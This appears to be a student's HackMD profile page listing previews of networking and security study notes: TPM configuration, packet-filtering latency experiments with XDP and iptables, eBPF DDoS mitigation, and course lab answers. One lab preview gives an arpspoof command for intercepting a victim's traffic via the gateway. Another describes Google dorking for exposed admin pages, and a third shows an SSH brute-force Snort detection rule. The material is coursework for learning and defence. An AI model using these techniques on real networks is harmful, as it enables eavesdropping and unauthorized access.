Nemo

@nemoz

Joined on Nov 8, 2021

  • 消除以往外部網路與內部網路的區別。也就是説,所有的流量都是untrust。內部資安人員應該對所有流量進行檢查與log並實行access control。 攻擊型態的轉變 2010年時一架飛機上載著10名看似正常不過且彼此互不認識的民眾——其中有人甚至幫微軟測試過軟體——從紐約飛往維也納,但他們的真實身份其實為俄羅斯間諜,且已保持著非常普通的狀態數年之久。他們努力的與美國具影響力的人物混熟,並向俄羅斯秘密發送獲取到的訊息。 從這個例子來說,現代的攻擊型態、週期已經拉長,駭客的攻擊手法已經變為"low and slow",也就是花漫長的時間搜集許多我們並不會特別留意的網路資料,整個時間會拉長到數月或著數年不等。且不同於以往的大範圍找尋可下手的目標,現代駭客的攻擊範圍只會越來越窄、越來越具針對性,特別是那些具有高價值的系統或資訊。 The Philip Cummings Problem Philip Cummings在一家為數個徵信所提供軟體的公司上班,其中與奈及利亞的犯罪集團合作,將客戶的信用資料轉給該集團。
     Like  Bookmark
  • Hyper-V 使用Windows原生的hyper-v虛擬平台,可以建立具有TPM module、支援secure boot的虛擬機,並且也可以安裝windows11。 安裝步驟 Prerequisites 首先我們需要啟用hyper-v的功能,進入控制台->程式集->開啟或關閉windows功能->勾選Hyper-V選項。 接著我們可以到臺大計算機中心下載學校提供的WIN11 ISO檔,為等一下的虛擬機器安裝做準備(請注意要在臺大的網域下。)。 https://download.cc.ntu.edu.tw/download.php 以及認證用的KMS腳本。
     Like  Bookmark
  • Group Policy setting Windows10、Windows11中可以使用Group Policy Setting來設定Windows系統對於TPM的使用方式。 我們可以按下windows鍵+R,並輸入:gpedit.msc,即可打開Group Policy Setting。 接著轉至:系統管理範本->系統->可信賴平台模組服務,便可設定windows系統對於TPM的原則。 The Level of TPM owner authorization information available to the operating system 此設定可以調整Windows會使用TPM來進行哪些特定行為。越高的層級,允許使用TPM的行為就越多。例如:
     Like  Bookmark
  • Task Specification In this note, I was trying to figure out several questions, including: Is my laptop (macbook air 2020) support TPM? And if so is it TPM 2.0? what functions can be done with my computer's TPM module? What are the algorithms it uses? Where does it store the key? What should be done when user forget the key? Can TPM increase the performance of "data in motion"?
     Like  Bookmark
  • About The Speed of Cipher Algorithms Situation Specification We already know that we can use this github project's engine to change the role of performing the encryption and decryption algorithms for SSL/TLS communication from the CPU to the TPM. Now we want to go a step further and measure the performance change after changing it to TPM. Task Specification The openssl project provides a useful function to measure the performance of each algorithms it can use, that is openssl speed. I planed to use openssl speed to test the performance difference between CPU and TPM in performing these encryption and decryption algorithms. We can simply type: openssl speed [algorithms]
     Like  Bookmark
  • ECDSA TPM sign verify sign/s verify/s 160 bits ecdsa (secp160r1) 0.0602s 0.0002s 16.6 6173.8 192 bits ecdsa (nistp192) 0.0603s 0.0002s 16.6 5192.3 224 bits ecdsa (nistp224) 0.0361s 0.0001s 27.7 10142.3 256 bits ecdsa (nistp256) 0.0362s 0.0001s 27.6 17669.3 384 bits ecdsa (nistp384) 0.0723s 0.0006s 13.8 1633.6 521 bits ecdsa (nistp521) 0.0722s 0.0004s 13.9 2248.3 163 bits ecdsa (nistk163) 0.1085s 0.1685s 9.2 5.9 233 bits ecdsa (nistk233) 0.1083s 0.1687s 9.2 5.9
     Like  Bookmark
  • Problem Specification We have previously experimented the performance measurement of three different packet filter approaches, that is user level filting, kernel level filting and driver level filting. But the latancy is too high due to all those experiments were done on virtual machines. Today we'll retest them with my PC. The platform we used is ubuntu 20.04 desktop, installing on AMD R5-3600 CPU with 6 core 3.6 GHZ. We'll first set up the whole structure below: We chose libpcap for user level filting, iptables as kernel level filting and xdp-filter as driver level filting. In the user space, there's a python program to specify timestamp_1, that is when the packet arrives to user space. There's also a xdp dump program load in driver level that can determine the timestamp_0, which is the time a packet going to the NIC card. So the total latency will be timestamp_1 - timestamp_0. Let's start with a simple test. We can use:
     Like  Bookmark
  • import socket import time HOST = '0.0.0.0' PORT = 7000 s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.bind((HOST, PORT)) print('server start at: %s:%s' % (HOST, PORT))
     Like  Bookmark
  • Q1 Q2 It did nothing. Q3 In order to execute the code below line 65, the name of program itself must be "ocl.exe". Q4
     Like  Bookmark
  • Problem Specification I tried to use a project from github a few days ago, but it seems like it's code is out of date and is too old to use. So I decided to build a userspace filter program my self. To do so, I need to study deep from libpcap and SO_ATTACH_BPF so that it can fullfill the central concepts of userspace filtering. The sole concept of userspace filtering is fuzzy. It has the advantages that can attach rules that more complicated than rules in the XDP or kernel space, and they can be varies from one applications to another. But should a packet go through kernel space or not? Thanks to the libpcap project, we can extract the packet out from the kernel early, and send it straight to the user space, otherwise the whole process is kind of slow because it needs to be copied from kernel memory spaces to user memory spaces after the packet go through the whole network stack datapath and which will take a lot of time. But with DPDK project, the packet will be send straight to user space when it's in driver level, so it didn't have to go into network stack, which saves time and avoid the memory copy process. So which one, with libpcap or with DPDK, should be called the finest way to fulfill userspace filter? I think it's maybe both. Task Specification I planned to build a bpf socket program first. With SO_ATTACH_BPF function and libpcap, a socket can dynamically attach or dettach a BPF or eBPF filter on it.
     Like  Bookmark
  • Q1 與lab3不同的是,lab4的main並不是一行行call subroutine,而是會循還、重複的進行。 Q2 我們可以看到在main函式裡多了for迴圈的架構。 Q3 在main裡的for迴圈每一次call parse函數,都會給其一個逐漸遞增的parameter i。
     Like  Bookmark
  • 姓名學號 B07901142 卓寧文 Google Hacking 我們可以看到,透過inurl參數可以讓我們從搜尋引擎資料庫裏面存的網頁的網址來做查詢,可以透過搜尋admin介面看看哪些網站的admin登入頁面沒藏起來。 Shodan
     Like  Bookmark
  • Problem Specification This week I was planning to reproduce the result from a Paper on packet filtering performance comparison. The paper focuses on three different levels of packet filtering, Driver level(via XDP), Kernel Level(via Iptables) and user space level(via a github project). I have already roughly analyzed the driver level and the kernel level, but have not yet started the user space part. This picture above shows the level of the three filters. The method used in the paper to implement user space filtering is using systemd and libpcap to create a socket with some filtering rules. This allows application developers to ship packet filtering rules that can be deployed together with their application, which not only makes every applications can have its own packet rules, also simplifies the central policy. Task specification The github project is from AlexanderKurtz's alfwrapper, application level firewall. It consists of three parts, systemd function for spawning ready-to-use socket to daemon, bpf virtual machine to determine if a packet should pass, and bcc project to compilng c program to bpf bytecode.
     Like  Bookmark
  • Q1 int v的位置在rbp - 0X8。 int n的位置在rbp - 0X4。 也就是說在每個factorial函數起始時並沒有給n、v初始值,每個函數會直接從rbp開始拉各4 byte給每個int。這就造成沒有初始區域變數的後果,前一個函數pop出去後,後一個函數的rbp來到了前一個函數的位置,宣告兩個int變數時用了頭8個byte,剛好用到了前一個函數用完的那兩個位置,這就是為什麼區域變數能用出全域變數的效果。 Q2 gets 無法指定buffer size,可以宣告char array point給他就可以指定有多長,但其無法判斷是否有超過,可以寫出其array 長度並造成可能的漏洞,在讀到最後一個byte的時候會插入一個\0。 fgets
     Like  Bookmark
  • lab 1 snort rules: alert tcp any any -> any 22 ( msg:"SSH Brute Force Attempt"; flow:established,to_server; content:"SSH"; nocase; ffset:0; depth:4; detection_filter:track by_src, count 2, seconds 1; sid:1000001; rev:1;) 首先標明了action為alert,並指定是來自任何ip送到本機的22 port,接著檢視其payload的前四個byte是否吻合"SSH",並加入一個filter篩出嘗試rate高於設定的數值,這裡設定是若一秒收到了兩次以上就會爆alert。
     Like  Bookmark
  • tcpdump 繼上次使用大量封包測試效能因為設備問題受阻後,這次想要研究該paper另一種測試方式:測試latency。較為理想的狀態為使用timestamp,這個之前有做過類似的,但測試結果較為受限。 詳見 https://hackmd.io/@nemoz/HJ4J3RNG5 。 由於是在Sender端傳出時就打上timestamp,所以會吃到Sender端network stack、連線的狀況及品質等,因此想在"Reciever NIC接收到封包後"第一時間打上timestamp,也就是將latency指代的data path從 轉變為 因此第一時間就想到正仁學長在課堂時分享的bcc專案:BPF Compiler Collection,對照上面的圖找到了可以監聽封包的最底層的工具:tcpdump,此工具可以讀取driver送上kernel的封包資訊及timestamp。 但結果是若開啟了XDP類型的firewall,tcpdump就收不到封包了,原因為下圖:
     Like  Bookmark
  • Performance Implications of Packet Filtering https://www.net.in.tum.de/fileadmin/bibtex/publications/papers/ITC30-Packet-Filtering-eBPF-XDP.pdf 現代的網路架構在防火牆上有一些缺失,主要有以下四個: 該被filter掉的packet太晚被filter掉導致效能出現不必要的overhead及隱藏的危險性 開發者對於送到自己的app的封包應該有最適的filtering規則,應該要能將自己的filtering policy與自己的app一起推出 就算管理者知道每個app的需求,還是需要應對數不清、不斷變動的網路相關configuration policy 最後就是效能的問題,與上面所述三者也都有相關 而現代所用的防火牆技術大部分是透過hook在kernel的module來達成的,比如iptables、nftables,但當一個packet被filter掉的時候,一些不必要的traffic早就造成了overhead,如 memory copy。為了解決上述問題,有兩種與以往不同的filter技術被推出,那就是將filter的場域從kernel分別往上移或往下移---往上移至user space或是將packet parsing的工作直接交由外部的FPGA類型網卡解決(見 https://www.xilinx.com/publications/about/ANCS_final.pdf )。
     Like  Bookmark
  • ARP Spoofing Address Resolution Protocol,將IP位置對應到實體(MAC)位置的協定,查詢者會會發出ARP request,詢問網域內有誰match到該IP,被match到的人發回ARP reply,告訴查詢者「我是這個IP,然後我mac address是...」,接著查詢者收到後會建立arp表,之後要再往該IP丟封包時就可以不用再問mac address了。 而ARP Spoofing就是攻擊者先用NMAP找到目標(通常為gateway)傳送偽造的ARP reply封包,欺騙受害者該IP對應到的是攻擊者的mac,讓受害者傳往該IP的封包都傳送到攻擊者這,接著攻擊者再透過IP轉發把封包轉給該IP真正所在地,神不知鬼不覺的竊聽二者的通訊。 $ arpspoof -i {NIC card} –t {victim IP} {Gateway IP) 用-i指定網路介面,-t指定受欺騙的機器,後面接著gateway的IP。 DHCP Spoofing
     Like  Bookmark
  • 專題閱讀-ICMP DDoS Mitigation with eBRF XDP Background ICMP DDos 過去要攻擊某服務的方法很簡單,對其地址傳送大量垃圾封包就可以消耗掉攻擊對象的運算資源、頻寬,不過很快的防火牆開始有了機制,能在偵測到來自某個位址的突然大量垃圾流量時就封鎖來自該位址的所有封包,後來派生出了DDoS,分散式阻斷服務攻擊。攻擊者在攻擊主要目標前會先透過社交網路之類的手段侵入其他防禦脆弱的host,在他們的主機中埋下malisious file,之後該主機就成為殭屍電腦。將被compromise的殭屍電腦們集中統一起來,同時對主要目標進行ICMP洪水攻擊,將導致前述防禦辦法失效,因此名為分散式阻斷服務攻擊。除了ICMP攻擊方法外,也有利用TCP的三向交握的漏洞來進行的方式,因交握的過程中server也會等待ACK,因此若設計程式來發送大量的SYN然後不回應來自server的SYN/ACK,也可達成同樣的效果。 eBPF Berkeley Packet Filter,是一種能在kernel space裡執行由user space定義的程式的技術。為了實現穩定與安全性,作業系統在核心的功能很難發生太大的改變,畢竟kernel擁有控制整個系統的權限,牽一髮而動全身,而透過eBPF,我們可以在將user space的程式run在作業系統,並透過eBPF map來讓kernel發生的事也可以被user space的application捕捉到,具體方法為撰寫C語言後由BPF編譯為byte code後丟下作業系統來verify與執行,並通過map將統計資料回傳給user space,供可視性的分析。 XDP 透過eBPF的技術,在linux kernel中透過使用者定義的規則來提早判斷packets的verdict。為了縮短從判斷到執行的時間,XDP hook在NIC的driver上,在Network stack被複製到記憶體前就已判斷完畢,因為複製到記憶體是非常expensive的行為,也提供了hacker能攻擊成功的間隙。透過在kernel space的分析,XDP可以根據eBPF的定義採取幾種行為:
     Like  Bookmark
  • SDN(Software Defined Networking) Reference : Software-Defined Networks: A Systems Approach Landscape Market 被視為一種市場的轉變,過去電腦行業主要的類型為為了客戶的特定目的推出特定的Solution,這種模式被稱為Vertical market(垂直市場),而SDN的目標是將市場改造為Horizontal ecosystem,即讓Hardware、OS、Application等都能分開,不需要相互依賴,以此來增加市場的豐富性,並將網路設備的控制權轉移回消費者手上,使得消費者能將其更貼近自身需求。 Technical 將網路設備的不同層級間拆開,並將各個單位間的介面開放並完善定義,這種行為被稱為disaggregation。這些層級包括:
     Like  Bookmark